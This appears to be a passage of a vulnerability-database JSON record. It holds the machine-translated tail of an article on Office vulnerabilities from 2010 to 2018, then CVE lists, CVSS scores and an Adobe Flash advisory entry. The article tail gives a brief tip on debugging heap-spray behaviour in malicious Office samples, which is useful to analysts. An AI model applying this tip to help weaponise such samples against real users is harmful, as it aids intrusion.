\nThe Open XML tag parsing class vulnerability analysis ideas \nIn debugging this relates to the heap spray in the office sample, the need to pay special attention to the debugger intervention tends to affect the process heap layout, particularly some of the heap option settings. If when debugging the sample behavior can not be a normal trigger, often directly with the debugger launch the sample result, this time you can try double-click the sample after Hang, the debug controller. \n\n\n**[1] [[2]](<94516_2.htm>) [[3]](<94516_3.htm>) [[4]](<94516_4.htm>) [next](<94516_2.htm>)**\n", "edition": 2, "cvss3": {}, "published": "2019-06-13T00:00:00", "title": "The macro perspective of the office vulnerability, 2010-2018-a vulnerability warning-the black bar safety net", "type": "myhack58", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2545", "CVE-2012-1856", "CVE-2012-1535", "CVE-2017-11292", "CVE-2018-8174", "CVE-2018-4878", "CVE-2011-0609", "CVE-2017-11882", "CVE-2018-0802", "CVE-2016-7855", "CVE-2017-8570", "CVE-2016-4117", "CVE-2012-0158", "CVE-2015-1642", "CVE-2010-3333", "CVE-2013-0634", "CVE-2015-5119", "CVE-2013-3906", "CVE-2014-4114", "CVE-2016-7193", "CVE-2018-15982", "CVE-2015-2424", "CVE-2018-8373", "CVE-2011-0611", "CVE-2015-5122", "CVE-2017-0199", "CVE-2015-0097", "CVE-2018-5002", "CVE-2018-0798", "CVE-2014-1761", "CVE-2014-6352", "CVE-2017-8759", "CVE-2015-1641", "CVE-2015-7645", "CVE-2017-11826", "CVE-2017-0262", "CVE-2012-0779", "CVE-2017-0261"], "modified": 
"2019-06-13T00:00:00", "id": "MYHACK58:62201994516", "href": "http://www.myhack58.com/Article/html/3/62/2019/94516.htm", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2021-06-08T18:56:57", "description": "Multiple memory corruptions, buffer overflows, information disclosure.", "edition": 2, "cvss3": {}, "published": "2015-07-19T00:00:00", "title": "Adobe Flash Player multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-5124", "CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-5123", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-5122", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-3097", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2015-07-19T00:00:00", "id": "SECURITYVULNS:VULN:14591", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14591", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}